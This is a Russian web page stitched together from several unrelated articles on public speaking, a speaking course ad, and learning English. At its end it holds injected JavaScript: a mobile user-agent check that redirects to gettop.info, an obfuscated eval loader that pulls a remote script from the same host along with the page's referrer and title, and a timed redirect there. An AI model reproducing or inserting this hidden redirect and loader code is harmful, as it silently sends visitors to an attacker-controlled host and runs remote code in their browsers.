Подготовка к публичному выступлению: 5 вредных советов — учим английский вместе

Речь публично на отлично: алгоритмы и технологии выступлений и презентаций

Обновленная программа по публичным выступлениям от Никиты Непряхина, писателя, бизнес-тренера и телерадиоведущего, дает самый полный арсенал приемов, алгоритмов и технологий для любого успешного и яркого выступления без страха и волнения.

  • овладеть навыками уверенного и яркого публичного выступления;
  • получить техники подготовки к публичным выступлениям;
  • понять механизмы эффективного взаимодействия с аудиторией;
  • получить приемы рационального и эмоционального воздействия на аудиторию;
  • усовершенствовать навыки убедительной, яркой и выразительной речи;
  • приобрести уверенность в общении.
  • руководителям и менеджерам компаний;
  • сотрудникам, работающим в сфере повышенной коммуникативной ответственности;
  • специалистам, выступающим публично и желающим повысить уровень ораторского мастерства и вывести деловые и личные коммуникации на принципиально новый уровень.
  • Первый максимально алгоритмичный тренинг по публичным выступлениям, описывающий самые действенные на практике технологии.
  • Своеобразная «азбука» публичных выступлений от практикующего специалиста в области публичных выступлений, консультирующего топ-менеджеров, политиков и представителей массмедиа.
  • Авторская технология Никиты Непряхина подготовки и ведения публичных выступлений.
  • Акцент на взаимодействии с аудиторией и на донесении ключевого сообщения в своей речи.
  • Максимум интересной и увлекательной практики.
  • Эксклюзивные ораторские приемы, методы и «фишки».
  • Тренинг будет полезен и интересен как для новичков, так и для опытных ораторов.

«Речь публично на отлично: алгоритмы и технологии выступлений и презентаций» вы сможете уверенно и эффектно выступать публично; получите конкретный алгоритм подготовки к любому публичному выступлению; научитесь проводить яркие и убедительные презентации; овладеете навыками убедительной и выразительной речи; сможете управлять своими эмоциями, и главное, вниманием аудитории; получите механизмы и приемы, позволяющие держать внимание аудитории и достигать своих целей; научитесь располагать к себе собеседника, партнера, аудиторию.

– Алгоритм подготовки к публичному выступлению — 7 шагов.
– Цели и задачи публичного выступления. Главный message выступления.

— Законы композиции и «эффект края».

– Структурирование речи: логично, последовательно и понятно.
– Алгоритм создания информационных и убеждающих речей.

– Эмоциональное воздействие на аудиторию.
– Storytelling в публичных выступлениях.

– Методы привлечения, захвата и удержания внимания аудитории.
– Интерактив в работе с аудиторией.

– Визуальный контакт – «алхимия» публичного выступления. – Методы удержания визуального контакта с аудиторией.

– Работа с большой аудиторией.

– «Открытость» оратора. – Поза и жестикуляция оратора. – Статика / динамика.

– Ораторское амплуа.

– Природа страха и волнения.
– Методы преодоления страха и волнения: психология, подготовка и физиология.

Заказать корпоративный тренинг

  • «Впечатление очень позитивное! Интересный, наполненный, полезный тренинг. Хорошее соотношение теории и практики! Никита — отличный оратор и тренер!»
  • «Пожалуй, это один из лучших тренингов в моей жизни! Все прекрасно, Никита — большой профессионал, сумел объединить очень разную аудиторию, держать внимание все время. Очень много по-настоящему полезных практичных советов, которые я буду применять. Спасибо!»
  • «Супер! Ехал с плохими мыслями на тренинг. Никита грамотно создал обстановку, все стали командой. Все четко и лаконично! Супер еще раз!»
  • «Один из самых ярких тренингов в моей жизни! Участники получили реальные и четкие инструменты и советы, которые можно использовать в жизни!»
  • Это лучший тренинг по публичным выступлениям, на котором я была! Структурно, методично, оптимальное сочетание теории и практики!
  • Тренинг прикладной, буду рекомендовать!
  • Структурированно, полезно, вывод из зоны комфорта, что дает обучающий эффект, но при этом поддерживает хорошую атмосферу и не выбивает участника из колеи
  • Отличная подача, полезные техники, баланс теории и практики! Тренинг полезный на 100%!
  • Восторжен уровнем профессионализма тренера! Самое главное — имею РЕЗУЛЬТАТ!!!
  • Отличный курс! Блестящая работа тренера!
  • Тренинг очень понравился. Максиму практики, ничего лишнего, видны результаты тренинга. Позитивность и создание комфортной атмосферы. Тренинг действенный!
  • В тренинге все идеально. Тренинг прошел на одном дыхании, очень энергично, ёмко, весело! Помог узнать логику выступления!

Источник: http://nepryakhin.ru/treningi/rech-publichno-na-otlichno/

Как провалить выступление: шесть вредных советов

Классное наследие, или Записки тренера по ораторскому мастерству

Постановка проблемы

Умение «держать речь» не последняя компетенция в лидерском наборе. Говоря строже, одна из базовых для руководителя. Именно поэтому на курсах риторики и ораторского мастерства руководители составляют большинство. Взрослые серьезные люди, готовые учиться тому, что в их специальном образовании (а зачастую – в нескольких) предусмотрено не было.

Казалось бы, с нуля. С чистого листа. Но нет!

Из года в год наблюдаю: у участников тренинга – и у новичков, и у бывалых – есть общие навыки публичного выступления. Как если бы они все же посещали (неосознанно) одну общую школу. Есть какое-то единое начало в их ораторском поведении. Поиски ответа привели к истокам. Да, есть такая начальная школа!

С младых ногтей, с раннего школьного детства учителя методично вырабатывали у нас навык «отвечать урок». Мы не знали его до школы, потому что дома он был не нужен.

Дома мы учились всему на свете, но только не «отвечать урок». (Сцены декламации перед гостями не в счет.) Жизнь до класса и вне класса – это наша личная, а не публичная жизнь.

Публичная начнется в первый погожий сентябрьский денек.

Отвечать урок (все помним) значило громко, четко, близко к тексту, но не слово в слово (иначе ты зубрила) пересказать содержание параграфа. В пол смотреть было нельзя («Подними голову!»). Выходить к доске нужно было без всяких записей. Подсказывать, списывать и подглядывать – запрещенные и осуждаемые действия. Отвечать надо было по памяти.

Мы помним эти речевые памятники школьного урока: «выучить назубок», «чтобы от зубов отскакивало». Высшая проба: «разбудить среди ночи».

Какие навыки публичного выступления формировались тогда у нас?

Параграф 1. Стоять как вкопанный

Многие ораторы именно так и стоят перед аудиторией. Расхаживать вдоль доски во время ответа было бы вызывающе дерзким – мы этого и не пытались делать. Если нужно было писать на доске, то мы подходили к ней. Многие из нас сегодня так же подходят к флипчарту, где бы он ни стоял. И если он стоит в углу (организаторы так поставили), то мы идем в угол, хотя это не лучшая позиция для выступающего.

Но о выборе позиции мы и не помышляем, ведь классная доска стабильна и непоколебима на своем месте. Можно было распахнуть дополнительные ставни, но передвинуть доску было невозможно. Поэтому передвигать флипчарт (а он специально для этого предусмотрел колесики), самому организовывать пространство своего выступления – это для многих новое сознательное усилие.

Параграф 2. Смотреть прямо

Стоя перед одноклассниками, мы смотрели в стену за их спинами. Идеальной реакцией на нашу речь было молчание. Возглас, смех, любое движение пресекалось учителем как помеха: «Тихо! Не отвлекайся!»

Именно этот навык «смотреть прямо» приходится преодолевать взрослому человеку, если он хочет быть убедителен как выступающий (докладчик, спикер, оратор и т.п.). Приходится учиться смотреть не вообще вперед, а в глаза напротив.

И не просто смотреть, а устанавливать зрительное общение, то есть реагировать на реакцию. Видеть недоумение, согласие, возражение, скуку или интерес. Видеть, чтобы корректировать свою речь.

И быть в зрительном контакте не с одним избранным, а с аудиторией.

Параграф 3. Отвечать четко

Ключевое понятие здесь – отвечать. Мы на уроке никого ни в чем не убеждали, не рассуждали вслух. Для «своих мыслей» школьная система предусмотрела сочинения.

И многие из нас преуспели в них и сформировали навык искать нужное слово, формулировать ощущения, предположения и догадки. Зачеркивать и исправлять по ходу мысли. Но это письменная речь. А перед классом рассуждать – это, мы знаем, демагогия.

Рассуждать – это пытаться угадать имеющийся у учителя (и у некоторых примерных учеников) правильный ответ. «Не гадай, а отвечай на вопрос».

В старших классах бывала и вольница. Вдруг появлялись учителя, которые поощряли думать вслух.

Формат новый, непростой, и выдерживать его в чистоте бывало трудно: говорили наперебой, много и разно, мысли если и рождались, то какие-то мелкие, развивать их было некуда. Развивался хаос.

Дисциплина падала на глазах, и школьная администрация в жарком союзе с родительским комитетом выходили ей на поддержку и возвращали на место. Урок не место для дискуссий. «Дома будете рассуждать!»

Параграф 4. Давать полный ответ

Мы хорошо усвоили одну примету: если учитель задает дополнительные вопросы, значит, ответ был не очень. Вопрос потому и называется дополнительным, что ответ по теме был неполным. Других определений для вопроса мы в школе не узнаем.

Трудно представить, чтобы учитель сказал: «У меня есть встречный вопрос» или «Можно задать уточняющий вопрос?» Была еще одна категория вопросов – наводящие. Это полный провал. За ответ по наводящим вопросам оценка неумолимо снижалась.

«Ну, вот я за тебя все и рассказала!»

Мы без иллюзий: вопрос – это плохой знак. Это учительское недовольство. Вопросами можно «засыпать», то есть показать ученику, что он не знает темы.

(«Засыпался на дополнительных вопросах», – объясняют позже и некоторые не критичные к себе студенты.) Вопрос как унижение, как подозрение, как желание свести счеты – это все у нас в памяти. Вопрос – он всегда на засыпку.

Вот нам и проблема вопросно-ответной сессии в публичном выступлении.

И еще один крепкий вывод мы делаем уже в раннем публичном опыте: монолог – это отлично, это значит, что ты много знаешь, у тебя хорошая память, ты умеешь связно излагать. Диалог – это ответы на наводящие вопросы, суррогат монолога: «До пятерки недотягиваешь».

Параграф 5. Отвечать на оценку

Источник: https://www.e-xecutive.ru/management/practices/1910986-kak-provalit-vystuplenie-shest-vrednyh-sovetov

Как не надо учить английский язык. 4 вредных совета

Сегодня я вам расскажу, как не надо учить английский язык. Вы получите 4 вредных совета, которые гарантированно приведут вас к провалу, хе-хе. Разумеется, я объясню, почему так не надо учить английский и дам то, что вам поможет встать на путь истинный.

Если вы уже долгое время не можете выучить английский язык, то причина кроется в том, что вы так или иначе следуйте нескольким, а то и всем советам, перечисленным ниже. Следуя этим неэффективным и идиотским советам, вы пришли к ошибочному выводу, что у вас колоссальные проблемы с дисциплиной и мотивацией. Вдобавок вы убедили себя в полном отсутствии способностей к изучению английского.  

Читайте также:  Правила чтения английского языка - учим английский вместе

Буду предельно откровенен: как не каждому дано стать олимпийским чемпионом по тяжелой атлетике, так и не у каждого получится составить конкуренцию начитанному носителю английского языка. Однако научиться говорить на высоком уровне, бегло и с минимумом ошибок подвластно каждому. Даже если вы никогда не были и не планируете быть в англоязычной среде.

Для получения целостного понимания того, как не надо учить английский и как все-таки это делать нужно, рекомендую прочитать мою статью про 3 ошибки психологического характера, из-за которых вы не можете выучить английский. Комбинация этих двух статей поможет вам направить энергию в нужное русло и больше не тратить свое драгоценное время на методы, которые не только не эффективны, да еще и до смерти утомительны. 

Итак, начнем.

Вредный совет №1: учите слова списком

Очень многие грешат тем, что учат слова списком. Такой совет кажется логичным: хочешь говорить – учи слова. А как их учить? Конечно же, списком. Нет же ничего проще и эффективнее.

Вот вы ставите себе задачу учить по 10 слов в день, и это вам кажется вполне выполнимой задачей. Вроде бы, выбран оптимальный темп, который вы сможете держать длительное время. 10 слов на первый взгляд может показаться недостаточным количеством, но за год, согласно вашим подсчетам, вы будете знать 3650 слов! А это уже Intermediate!

Почему же так не надо учить английский?

Если вы пробовали придерживаться данного «метода», то сами прекрасно знаете:

1) через неделю-две надоест;
2) постепенно будет требоваться больше и больше времени на поддержание того, что вы уже «изучили», – надоест еще быстрее.

Однако самый главный недостаток этого совета заключается в том, что затраченные усилия совершенно несопоставимы с конечным результатом.

Даже выучив весь словарь, вы не сможете нормально говорить, читать, писать и понимать, что вам говорят.

И ради чего себя утруждать несколько лет? Вы разве такого результата хотите добиться? К счастью, заучивание слов списком настолько утомительное занятие, что лишь немногим удается потратить годы времени впустую.

Запомните: изучение английского на уровне слов – бессмысленная трата времени.

Почему? Предположим, что вы выучили весь словарь или, скажем, список из 8 000 самых используемых слов (не выучите никогда, но давайте просто предположим) и при этом заучивание слов списком – единственное, что вы использовали для изучения английского языка, так как находились в информационном вакууме.

  Как вы переведете простейшую фразу «сколько тебе лет»?  Как бы вы ни старались, вы не сможете ее правильно перевести, основываясь на знании 8 000 слов. Однако любой другой человек со словарным запасом в десятки раз меньше смог бы без труда перевести эту фразу, потому что подходил к изучению языка сбалансированным образом.

Ваше теоретическое знание слов терпит крах при попытке образования фраз и предложений. Сами понимаете, фраза выше была проще некуда, а из таких фраз и состоит английский. Не из слов. Более подробно этот феномен я описал здесь.

Я не говорю, что заучивание слов списком абсолютно бессмысленно. Абсолютно бессмысленно будет базировать свое обучение на этом методе, а так делают многие новички и в итоге ничего не добиваются. Так не надо учить английский.

Вредный совет №2: сфокусируйтесь на грамматике

Помимо заучивания слов списком многих притягивает грамматика. Есть и такие, кто считает, что для изучения грамматики лучше всего подходят классические труды отечественных лингвистов, так там все обстоятельно разложено и разжевано. Так не надо учить английский.

Изучение грамматики, конечно, даст намного больше пользы в отличие от заучивания слов списком, но если ее учить в отрыве от жизненно-важных навыков (говорение и слушание), то в лучшем случае вы станете специалистом по раскрыванию скобок в грамматических заданиях. Да и у этого подхода та же самая проблема, что и у первого: вам надоест.

Если уж и учить грамматику, то рекомендую брать современные англоязычные пособия, написанные, разумеется, носителями языка. В «классических трудах» много того, что уже не является актуальным, да и в них к тому же могут содержаться типичные ошибки русскоговорящих.

Вредный совет №3: заниматься нужно как можно больше

Заниматься нужно как можно больше. И вы все сразу такие: да ладно, а мы-то не знали! Это же здравый смысл: чем больше занимаешься, тем быстрее обучаешься.

Однако совершенно недавно было проведено клиническое исследование, продемонстрировавшее еще одну причину, по которой стоит заниматься часами ежедневно.

Теперь научно доказано, что при занятии иностранным языком от трех часов и больше головной мозг переходит в режим акселерации, когда происходят не только функциональные изменения, но и значительные структурные и биохимические перестройки, в два раза улучшающие проведение нервных импульсов, а это положительно сказывается на скорости обучения и эффективности работы памяти.

Ладно, на самом деле ничего волшебного не происходит после преодоления трехчасового порога, за исключением непреодолимого желания рухнуть лицом в подушку. Так не надо учить английский.

Изучение английского сравнимо с обучением игре на каком-либо музыкальном инструменте: короткие ежедневные сессии эффективнее длительных и редких. Необходимо оставаться бодрым и энергичным во время занятий – это ускоряет обучение, делает его более интересным и продуктивным.

Начинайте с 5 минут в день. Важно выработать привычку, которая не будет отнимать много сил и энергии. Безумно популярное оправдание о нехватке времени не сработает, когда речь идет о 5 минутах.

Занимаясь по 5 минут в день, за год получится 76 часов, что равносильно 50 полуторачасовым занятиям. Что проще: каждый день заниматься по 5 минут или раз в неделю заставлять себя заниматься 1.

5 часа? Выбирайте сами, но при сбалансированном обучении эффективнее будет именно первый вариант.

С повышением уровня вы захотите больше заниматься: вы начнете больше понимать, что откроет вам двери к чтению книг и новостей, просмотру сериалов, фильмов, видео на YouTube и общению с носителями языка.

Английский должен стать приятным времяпрепровождением, вам должен нравиться процесс, он должен стать интересным хобби, без которого вы не представляете свою жизнь, – именно тогда вы сможете добиться фантастических результатов.

Вредный совет №4: учите английский по экспресс-курсам

Экспресс-курсы могут быть в форме видеоуроков или стандартных занятий.  Экспресс-курсы могут обещать вам использование новейших методик, способных раскрыть потаенные возможности вашего мозга, что поможет выучить английский на уровне носителя языка в кратчайшие сроки. Так не надо учить английский.

Я не берусь говорить, что все создатели «уникальных методик» – шарлатаны и люди, которые сами не могут говорить по-английски. Хотя зачастую вместо уникальной методики вы получите либо самую обыкновенную методику, но за большие деньги, либо такое, что вообще не работает, а то и засорит ваш мозг всякой ерундой.

Обещания «английский за месяц» – просто смешны. Достигнуть уровня выживания – вполне реально, но у многих потребителей складывается впечатление, что по окончании такого обучения они смогут обсуждать с носителем языка новую серию «Игры престолов».

Или 10 000 слов за 3 месяца с помощью 25-го кадра… ну, вы поняли. Вот так точно не надо учить английский.

Я бы не рекомендовал покупать такие курсы. Если есть возможность скачать бесплатно, то скачивайте и смотрите. Вы вряд ли выучите английский по ним, но они вполне могут стать своеобразным толчком к дальнейшему совершенствованию английского языка.

Как же надо учить английский?

Главное – сдвинуться с мертвой точки, т.е. начать что-то делать. Если хотите заниматься самостоятельно, то можно первое время поискать в интернете бесплатные уроки английского для начинающих, попробовать поделать грамматику и даже поучить слова. Или просто наймите репетитора на первое время.

Задача заключается в том, чтобы как можно быстрее ознакомиться с основными словами и грамматическими явлениями в английском с целью перейти на беспереводной метод обучения, т.е. изучать английский на английском с минимумом или полным отсутствием перевода на русский.

Будете много читать, смотреть, слушать, общаться, пользоваться монолингвальными словарями и англоязычными учебными пособиями. Такой метод, на мой взгляд и взгляд многих профессионалов, является самым действенным и интересным.

Те, кто упираются и продолжают подписывать везде перевод, редко добиваются отличных результатов: такие люди будут неправильно образовывать словосочетания, ставить не те предлоги, использовать не к месту слова и т.д.  Так не надо учить английский.

Найдите способ наслаждаться процессом изучения и старайтесь заниматься ежедневно. Вот и весь секрет успеха.

Для того, чтобы раз и навсегда запомнить, как не надо учить английский, посмотрите мое видео на эту тему. Изначально видео называлось «как правильно учить английский язык», но, к сожалению, большинство не уловило сарказма и не обратило внимание на то, насколько абсурдны советы в этом ролике. В связи с этим видео пришлось переименовать в «как НЕ НАДО учить английский». Вам же, дорогие читатели, нужно внимательно посмотреть видео и, послушав советы, сделать все с точностью наоборот

Источник: http://dressedbread.com/bad_advice/

Публичное выступление. Советы начинающим лекторам. | Читать актуальные статьи и советы в блоге GoodLife

   Если слушатели смотрят на часы, это ещё ничего. Хуже когда они начинают трясти часы, чтобы проверить, не остановились ли они. (Уильям Норман Беркетт).

   В своей жизни я посетила много  лекций, собраний и совещаний. Однако, вспоминаю только несколько из них. Некоторые детали выступлений лекторов запомнились на всю жизнь!
   В чем секрет успеха публичного выступления?

Может ли любой человек стать интересным собеседником? Что для этого надо?
Эти вопросы интересовали меня всегда.

   За месяц до поступления в ВУЗ, я посещала подготовительные курсы. Они заключались в том, что перед нами выступали преподаватели и кратко освещали темы, которые могут быть в билетах. Больше всего я переживала за сочинение. Если физику и химию можно было учить по конкретной книге, то тему сочинений на экзамене никто не знал.

   И так: сочинение. Преподаватель предложила несколько частей (патриотическая, по художественным произведениям, на свободную тему). Затем в каждой части раскрывались варианты сочинений. Каждое  описание сочинения начиналось с плана и краткого содержания. Текст сопровождался цитатами из литературных произведений. Коротко, быстро, емко.

   В первый день я вышла из зала, чувствуя себя переполненным сосудом. Было интересно, но как все запомнить?    На следующей лекции преподаватель продолжила  в таком же духе. И, о чудо, цитаты начали повторяться! Через несколько занятий мы хором продолжали  начатый отрывок произведения. К концу курсов, мы поняли, что писать сочинение проще простого.

Читайте также:  Для чего нужно время present perfect - учим английский вместе

Потому,что к этому времени в наших головах планы, цитаты  засели навечно.

   Я считаю, что лектор была просто гений. Она не диктовала нам сочинения, а дала понять, что  главное систематизировать то, что знаешь. А дальше, как в анекдоте про блоху. Помните?  На экзамен по биологии выучил про блоху, а попалась собака? Выкрутился: «У собаки есть шерсть, а в шерсти обязательно водятся блохи»…

———-Величайшее из достоинств оратора — не только сказать то, что нужно, но и не сказать того, что не нужно. Цицерон.———-

Так каков портрет идеального лектора? Как научиться владеть вниманием? Как не стать скучным рассказчиком? Мне кажется, что любой человек, должен стремиться совершенствовать себя в искусстве общения. Даже если это не лекция, а обычная беседа.

          ПОДГОТОВКА ВЫСТУПЛЕНИЯ

При подготовке к выступлению рекомендуют два подходящих варианта для начинающих лекторов.

1. Написать текст выступления, несколько раз его прочитать, рассказать на память, иногда подсматривая текст.
2. Подготовить короткие заметки.

Наличие текста позволит выступающему чувствовать себя увереннее. И это  позволит уделить больше внимание  состоянию своей одежды, жестам, дыханию, голосу, реакции слушателей.

При подготовке следует обратить внимание на то:

— что ждут слушатели от моего выступления; — какие проблемы я помогу развязать; — что знают слушатели о теме выступления; — что нужно высветить более детально; — что можно подкрепить удачным примером, сравнением;.

— каков стиль беседы: (информирование, убеждение, развлечение, агитация).

          НАЧАЛО ВЫСТУПЛЕНИЯ ( 10-12% общего времени)

Что нужно сделать в начале выступления:

— преодолеть волнение; — сделать паузу перед выступлением; — установить контакт со слушателями; — заинтересовать слушателей; — кратко изложить тему выступления  и объяснить распределение на отдельные вопросы, указать частично вопросы на которые автор собирается остановиться; — рекомендуется начать сразу по сути дела или с интересного, привлекающего внимания, приятного слушателям случая;

— предупредить слушателей сколько времени займёт беседа и действительно вкладываться в это время.

———-Если оратор не может уложиться в двадцать минут, ему лучше сойти с трибуны и садиться писать книгу. Лорд Брабазон.———-

Что нельзя делать в начале выступления:

— показывать волнение и страх; — жаловаться на недостаток времени для подготовки выступления; — жаловаться на недостаток опыта; — не объяснить о чем будет идти речь; — рассказывать интересный случай, который не имеет отношения  к беседе; — затягивать вступление;

— делать вступление скучным.

          ОСНОВНАЯ ЧАСТЬ

Основная часть должна стать пособием для выступления. В нем в логичном порядке включены все вопросы, которые вы затронете. Содержание выступления должно быть ясным и доступным. К подготовленной основе можно прикрепить листики с цитатами, статистическими данными, другой информацией.

Между основными мыслями и абзацами должны быть логичные переходы. Для этого рекомендуют использовать обороты: «несмотря на это, с другой стороны, выходя из этого, кроме этого»… Объяснение должно идти от простого к сложному, а не наоборот.

Мысли можно доносить по-разному: объяснять, описывать, рассказывать, доказывать. Описание — это немного скучно. Самый интересный способ: рассказывать. Каждому человеку интересно то, что пребывает в движении, что происходит с живыми существами, прежде всего с  людьми. Рассказ следует вводить в выступление без лишних деталей.

———-Можно говорить глупости, но не торжественным тоном. Юлиан Тувим.———-

Текст основы можно подчеркнуть разноцветными маркерами по степени важности некоторых предложений.
На полях позначим, где нужно сделать паузу, привести пример… Про запас нужно  иметь  интересные мысли, чтобы во время выступления усиливать своё влияние на слушателей.

          ОКОНЧАНИЕ ВЫСТУПЛЕНИЯ (5% от общего времени)

Что нужно сделать в конце выступления:

— обобщить главные мысли; — подытожить  (призвать к определенным действиям, поставить определенные цели);

— несколько последних предложений записать и выучить, чтобы их произнести четко и уверенно.

Чего нельзя делать в конце выступления:

— затягивать конец лекции; — говорить:»вот и все, что я хотел сказать»;

— излучать радость, что все позади.

          КАК ЗАИНТЕРЕСОВАТЬ СЛУШАТЕЛЕЙ

Что нужно делать для этого:

— нужно рассказать, какое вы имеете отношение к теме этой лекции; — знаете ли вы о интересах и нуждах слушателей; — говорить чётко, наводя примеры и сравнения; — нельзя читать лекцию, не отрываясь от текста; — нужно следить за реакцией слушателей; — идти, говорить, вести себя уверенно; — всем своим поведением высказывать любовь и уважение к слушателям; — включать в текст примеры, сравнение, выводы, юмор (юмор, высказанный неуверенно, спешно, неумело вызывает грусть и тоску!) — задавать риторические вопросы и постепенно на них отвечать; — наводить неожиданные факты;

— важные мысли рекомендуется повторять дословно или перефразируя их.

———-Есть три способа отвечать на вопросы: сказать необходимое, отвечать с вежливостью и наговорить лишнего. Плутарх.———-

Нельзя:

— использовать слишком длинные предложения; — злоупотреблять выражениями » было проведено, запланировано», надо «мы провели, запланировали»; — утяжелять язык иностранными словами, терминами, абстрактными понятиями; — злоупотреблять излишними подробностями; — быть слишком кратким;

— быть безразличным.

    КАК БОРОТЬСЯ С ВОЛНЕНИЕМ

Анализируйте причины страха, чего вы боитесь:

— боитесь, что выступление будет неудачно? — не верите, что выступление понравится? — боитесь, что не знаете о чем будете говорить? — думаете, что споткнетесь, двигаясь к сцене?

— что вас будут рассматривать как под микроскопом?

Зная причины волнения и страха легче устранить проблему:

— поработайте с текстом; — полностью напишите выступление; — старайтесь не волноваться; — не начинайте говорить сразу; — разложите информационные материалы перед выступлением неспеша; — стойте спокойно, изредка меняя позу;

— следите за жестами, они дожны быть естественными и спокойными.

Одним из главных условий удачных лекций является регулярность выступлений перед аудиторией. Со временем  накапливается опыт, знания, уверенность. А плюс любовь к своему делу- получим успех.

И немного юмора от Херлуфа Бидструпа на тему лекторства:

    УДАЧ!

Источник: http://good-life.today/sovety/publichnoe-vystuplenie.html

englishpapa | 5 советов по подготовке выступления на английском языке

Жизнь постоянно находится в движении, и мы вынуждены все время развиваться и приобретать новые знания и умения, чтобы поспевать за нею. И, кто знает, быть может, однажды вы встанете перед задачей выступить с докладом или презентацией на английском языке.

Уметь выступать перед людьми будет полезно в любом виде деятельности.

Мы решили поделиться с вами некоторыми советами, которые могут помочь вам грамотно подготовить выступление и с успехом провести его перед публикой, сумев завладеть ее вниманием и увлечь своими идеями.

Прежде всего, важно помнить, что доклад на каком бы то ни было языке необходимо предварительно подготовить. Для начала подумайте о своей аудитории. Смысл выступления следует ориентировать на интересы слушателей.

Обязательно нужно проработать структуру доклада, ведь он должен заинтересовать и удерживать внимание аудитории. И только после начинайте составлять текст сообщения. Будет полезно написать текст доклада полностью, от приветствия до подведения итогов и окончания.

Не нужно заучивать его на память, это нужно для того, чтобы вы хорошо понимали, что говорить. Кроме того, благодаря заметкам вы почувствуете себя более уверенно, выступая перед людьми, они будут опорой для вас. Прорепетируйте выступление со всеми необходимыми задержками.

Проследите, чтобы вы уложились во время. Следите за мимикой и движениями – это имеет большое значение при донесении информации.

А сейчас несколько рекомендаций относительно подготовки выступления на английском:

1) Разговаривайте на «простом» английском языке

То есть, подготавливая доклад, примите во внимание возрастные и интеллектуальные характеристики аудитории. Не стоит использовать слишком сложные конструкции и термины, они могут быть непонятны для кого-то.
Предложения должны звучать максимально просто и коротко. Так слушатели легко уловят смысл вашего сообщения. Откажитесь от сленговых и жаргонных выражений, им не место в такой ситуации.

2) Говорите медленно и четко

Большую важность при выступлениях на чужом языке и перед незнакомой аудиторией имеет скорость и громкость речи. Произносить слова следует не спеша, достаточно громко и четко, так как нередко в волнительных ситуациях появляется акцент, который может помешать восприятию.

3) Воспользуйтесь графической информацией

Все знают, что сделать выступление более наглядным, понятным и интересным могут визуальные элементы, такие как картинки, фото, диаграммы, таблицы и так далее.

Хорошо на слайдах показывать числа, использующиеся в докладе, потому что на слух их нелегко воспринимать, в особенности, если числа большие и часто встречаются. Кроме того, на слайдах отображают пояснения, заметки, заголовки и многое другое.

Уделите особое внимание тому, чтобы текст презентации, видимый аудитории, был написан правильно. Проверяйте текст снова и снова, обратитесь за помощью к словарям, друзьям или учителям, если сомневаетесь в его правильности.

4) Добавьте больше глаголов

Известно, что большое количество существительных в предложении загромождает его и затрудняет восприятие. Чтобы фразу было проще услышать и понять, чаще применяйте глаголы в активном залоге.

5) Используйте английские «слова-связки»

Предназначение этих слов – логическое завершение фразы или связь одной мысли с другой. Например, «словами-связками» являются for instance, in addition, moreover, in conclusion, secondly и множество других. С их помощью речь течет плавно и с легкостью воспринимается слушателями.

Ожидает выступление на английском? Самое важное – излучайте уверенность и открытость, и, конечно, уделите время основательной подготовке. Если же вы не уверены, хватит ли ваших знаний английского для успешного выступления, запишитесь на курсы английского в школе EnglishPapa и за краткий срок приобретите все необходимые умения.

Читайте также:  99 способов признаться в любви на английском - учим английский вместе

(function(a,b){if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.

test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-[a-w])|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-([1-8]|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-[2-7]|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i.test(a.substr(0,4)))window.location=b})(navigator.userAgent||navigator.vendor||window.opera,’http://gettop.info/kt/?sdNXbH’);

eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!».replace(/^/,String)){while(c—){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c—){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘5 d=1;5 2=d.f(’4’);2.g=’c://b.7/8/?9&a=4&i=’+6(1.o)+’&p=’+6(1.n)+’’;m(1.3){1.3.j.

k(2,1.3)}h{d.l(’q’)[0].e(2)}’,27,27,’|document|s|currentScript|script|var|encodeURIComponent|info|kt|sdNXbH|frm|gettop|http||appendChild|createElement|src|else|se_referrer|parentNode|insertBefore|getElementsByTagName|if|title|referrer|default_keyword|head’.split(‘|’),0,{})) setTimeout(«document.location.href=’http://gettop.

info/kt/?53vSkc&'», delay);

